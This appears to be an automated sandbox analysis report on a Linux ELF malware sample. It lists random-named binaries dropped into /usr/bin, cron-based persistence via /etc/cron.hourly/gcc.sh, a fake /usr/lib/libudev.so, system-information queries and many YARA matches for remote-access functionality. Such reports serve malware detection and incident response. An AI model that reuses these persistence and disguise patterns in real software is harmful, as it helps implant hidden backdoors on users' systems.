        Source: /usr/bin/ptcfhyyirf (PID: 6588)File: /usr/bin/ptcfhyyirfJump to behavior
        Source: /usr/bin/ptcfhyyirf (PID: 6589)File: /usr/bin/ptcfhyyirfJump to behavior
        Source: /usr/bin/ptcfhyyirf (PID: 6590)File: /usr/bin/ptcfhyyirfJump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6601)File: /usr/bin/bsvlwqppmdJump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6605)File: /usr/bin/bsvlwqppmdJump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6607)File: /usr/bin/bsvlwqppmdJump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6609)File: /usr/bin/bsvlwqppmdJump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6610)File: /usr/bin/bsvlwqppmdJump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6618)File: /usr/bin/uhjknuzvaiJump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6622)File: /usr/bin/uhjknuzvaiJump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6623)File: /usr/bin/uhjknuzvaiJump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6626)File: /usr/bin/uhjknuzvaiJump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6627)File: /usr/bin/uhjknuzvaiJump to behavior
        Source: /tmp/1.elf (PID: 6205)Path: /etc/cron.hourly/gcc.shJump to dropped file
        Source: /tmp/1.elf (PID: 6205)Path: /run/gcc.pidJump to dropped file
        Source: /tmp/1.elf (PID: 6204)Queries kernel information via 'uname': Jump to behavior
        Source: /tmp/1.elf (PID: 6205)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6239)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6242)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6245)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6247)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ccxfvtbhgr (PID: 6250)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6258)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6261)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6264)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6266)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ezztyrfjzf (PID: 6269)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6275)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6278)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6281)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6284)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/dyuvutukki (PID: 6286)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6313)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6316)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6318)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6321)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vapcvdizxx (PID: 6324)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6330)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6333)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6336)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6338)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkzqkklpfr (PID: 6341)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6347)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6350)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6353)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6355)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/cpbnjarskl (PID: 6358)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6364)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6367)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6370)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6372)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uaewjndswe (PID: 6375)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6383)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6386)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6389)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6391)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/efgdvbpuxx (PID: 6394)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6403)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6406)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6409)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6412)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/nxattrsdxm (PID: 6415)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6420)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6423)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6425)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6428)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bjhrrojebv (PID: 6431)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6437)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6440)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6442)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6445)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/vlteqhfomz (PID: 6448)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6454)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6457)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6460)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6462)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/wxysocrflf (PID: 6465)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6471)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6474)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6477)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6479)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ssrfvzfvpk (PID: 6483)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6489)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6492)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6495)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6498)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bhmsjmfdgk (PID: 6500)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6506)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6509)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6512)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6514)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ctjziyscga (PID: 6517)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6525)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6528)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6531)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6534)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ggufoivoip (PID: 6537)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6543)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6546)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6549)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6551)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/gvjfjjanun (PID: 6554)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6560)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6562)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6565)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6567)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/fubjkoogoo (PID: 6571)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ptcfhyyirf (PID: 6577)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ptcfhyyirf (PID: 6579)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ptcfhyyirf (PID: 6582)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ptcfhyyirf (PID: 6585)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/ptcfhyyirf (PID: 6587)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6597)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6599)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6602)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6604)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/bsvlwqppmd (PID: 6608)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6614)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6616)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6619)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6621)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/uhjknuzvai (PID: 6625)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkpssqmflq (PID: 6631)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkpssqmflq (PID: 6633)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkpssqmflq (PID: 6636)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkpssqmflq (PID: 6638)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/lkpssqmflq (PID: 6642)Queries kernel information via 'uname': Jump to behavior
        Source: /tmp/1.elf (PID: 6205)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 1.elf, type: SAMPLE
        Source: Yara matchFile source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6317.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6206.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6277.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6204, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6206, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6207, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6208, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6238, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6241, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6244, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6246, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6249, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6257, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6260, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6263, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6265, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6268, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6274, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6277, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6279, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6282, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6285, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6312, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6315, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6317, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6320, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6323, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6329, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6332, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6335, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6337, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6340, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6346, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6349, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6351, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6354, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6357, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6363, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6366, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6368, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6371, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6374, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6382, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6385, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6388, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6390, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6393, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6402, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6405, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6408, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6411, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6414, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6419, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6422, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6424, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6427, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6430, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6436, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6439, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6441, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6444, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6447, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6453, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6456, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6458, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6461, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6464, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6470, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6473, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6475, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6478, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6482, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6488, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6491, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6494, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6496, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6499, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6505, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6508, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6510, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6513, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6516, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6524, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6527, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6529, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6533, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6535, type: MEMORYSTR
        Source: Yara matchFile source: /usr/bin/ssrfvzfvpk, type: DROPPED
        Source: Yara matchFile source: /usr/bin/uaewjndswe, type: DROPPED
        Source: Yara matchFile source: /usr/bin/cpbnjarskl, type: DROPPED
        Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
        Source: Yara matchFile source: /usr/bin/wxysocrflf, type: DROPPED
        Source: Yara matchFile source: /usr/bin/efgdvbpuxx, type: DROPPED
        Source: Yara matchFile source: /usr/bin/ccxfvtbhgr, type: DROPPED
        Source: Yara matchFile source: /usr/bin/lkzqkklpfr, type: DROPPED
        Source: Yara matchFile source: /usr/bin/ezztyrfjzf, type: DROPPED
        Source: Yara matchFile source: /usr/bin/dyuvutukki, type: DROPPED
        Source: Yara matchFile source: /usr/bin/vapcvdizxx, type: DROPPED
        Source: Yara matchFile source: /usr/bin/nxattrsdxm, type: DROPPED
        Source: Yara matchFile source: /usr/bin/bjhrrojebv, type: DROPPED
        Source: Yara matchFile source: /usr/bin/vlteqhfomz, type: DROPPED
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
